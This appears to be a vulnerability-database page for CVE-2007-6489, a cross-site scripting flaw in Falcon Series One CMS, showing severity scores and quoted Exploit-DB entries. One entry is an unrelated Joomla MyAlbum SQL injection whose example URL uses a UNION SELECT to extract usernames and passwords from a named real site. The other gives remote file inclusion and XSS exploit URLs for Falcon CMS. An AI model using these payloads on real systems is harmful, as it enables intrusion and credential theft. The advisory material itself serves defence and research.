CVE-2007-6489
published 2007-12-20CVE-2007-6489: Multiple cross-site scripting (XSS) vulnerabilities in Falcon Series One CMS 1.4.3 allow remote attackers to inject arbitrary web script or HTML via the (1)…
PriorityP335high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
6.84%
93.2th percentile
Multiple cross-site scripting (XSS) vulnerabilities in Falcon Series One CMS 1.4.3 allow remote attackers to inject arbitrary web script or HTML via the (1) gb_mail, (2) gb_name, and (3) gb_text parameters in a guestbook action to index.php, and unspecified other vectors.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| falcon | series_one_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component MyAlbum 1.0 - 'album' SQL Injection
exploitdb·2008-03-28
CVE-2008-6489 Joomla! Component MyAlbum 1.0 - 'album' SQL Injection
Joomla! Component MyAlbum 1.0 - 'album' SQL Injection
---
# Title : Joomla Component MyAlbum SQL Injection Vulnerability
# Author : parad0x
# D.Page : http://joomlacode.org/gf/project/myalbum/
http://[target]/index.php?option=com_myalbum&album=[SQL]
Example:
http://www.akparti.org.tr/disiliskiler/index.php?option=com_myalbum&album=-1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*
greetz : VoLqaN
http://inso.host.sk
side note:
myalbum
01.06.2007
Hüseyin Bora ABACI
GNU/GPL
[email protected]
www.joomla.org
1.0
MyAlbum is practical,comfortable,fast simple a picture gallery component.
# milw0rm.com [2008-03-28]
Exploit-DB
falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting
exploitdb·2007-12-10
CVE-2007-6490 falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting
falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting
---
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ __| |___||__|
\/\______| \/ \/
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
Multilple Remote File Inclusion - Permanent Xss
# Author: MhZ91
# Title: Falcon Series One - Multilple Remote File Inclusion + Permanent Xss
# Download: http://sourceforge.net/projects/falconcms/
# Bug: Multilple Remote File Inclusion + Permanent Xss
# Severity: High
# Visit: http://www.inj3ct-it.org
Exploit: http://[site]/sitemap.xml.php?dir[classes]=[Evil_Code]
Vuln code: @include_once ($dir['classes']."class.pages.php");
Exploit: http://[site]/errors.php?error=[Evil_Code]
Vuln code:
Permanent Xss at http://[site]/index.php?guestbook=v in the input gb_mai
No writeups or analysis indexed.
2007-12-20
Published